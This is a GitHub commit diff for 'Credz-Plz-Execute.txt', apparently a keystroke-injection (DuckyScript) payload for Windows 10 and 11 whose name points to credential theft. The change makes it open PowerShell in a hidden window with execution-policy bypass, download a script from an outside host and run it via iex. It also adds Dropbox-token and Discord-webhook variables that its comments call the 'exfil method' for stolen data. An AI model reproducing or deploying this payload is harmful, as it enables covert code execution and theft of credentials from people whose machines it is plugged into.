Updated Credz-Plz-Execute.txt

- Updated script to run PowerShell with a hidden window.
- Added Discord webhook variable to script.
- Added additional instructions.
This commit is contained in:
Kavitate 2022-12-21 10:24:15 -06:00 committed by GitHub
parent 624c9ac2df
commit cb748677b7
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -8,8 +8,10 @@ REM Target: Windows 10, 11
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -noexit -ep bypass $db='';iwr https://jakoby.lol/35k | iex STRING powershell -w h -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex
ENTER ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Fill in either variable or both to set your exfil method.
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly REM $db is the variable that holds your DropBox token.
REM $dc is the variable that holds your Discord webhook.
REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.